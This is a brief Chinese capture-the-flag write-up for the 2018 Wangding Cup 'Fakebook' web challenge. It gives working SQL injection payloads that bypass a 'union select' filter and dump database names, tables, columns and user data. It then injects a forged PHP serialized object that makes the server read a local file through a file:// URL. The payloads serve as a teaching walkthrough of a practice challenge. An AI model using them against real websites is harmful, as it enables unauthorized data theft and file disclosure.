[网鼎杯 2018]Fakebook1

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数

说明注入列数为4

测试注入点

union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from

information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from

information_schema.tables where table_schema='fakebook' #

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from

information_schema.columns where table_name='users' #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果

data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

相关推荐
西柚小萌新1 分钟前
【大模型:知识图谱】--3.py2neo连接图数据库neo4j
数据库·知识图谱·neo4j
wangfenglei1234568 分钟前
mybatis打印完整的SQL,p6spy
数据库·sql·mybatis
__风__11 分钟前
PostgreSQL ERROR: out of shared memory处理
数据库·postgresql
占星安啦21 分钟前
一个html实现数据库自定义查询
java·前端·javascript·数据库·动态查询
天空之城夢主40 分钟前
MySQL 全量、增量备份与恢复
数据库·mysql·oracle
Elastic 中国社区官方博客43 分钟前
连接关键点:使用 ES|QL 联接实现更丰富的可观测性洞察
大数据·数据库·sql·elasticsearch·搜索引擎·全文检索
元闰子1 小时前
AI Agent需要什么样的数据库?
数据库·人工智能·后端
什么都想学的阿超1 小时前
【PostgreSQL 02】PostgreSQL数据类型革命:JSON、数组与地理信息让你的应用飞起来
数据库·postgresql·json
小陈又菜1 小时前
SQL Indexes(索引)
数据库·sql·索引
TDengine (老段)2 小时前
TDengine 的 AI 应用实战——运维异常检测
大数据·数据库·人工智能·物联网·时序数据库·tdengine·涛思数据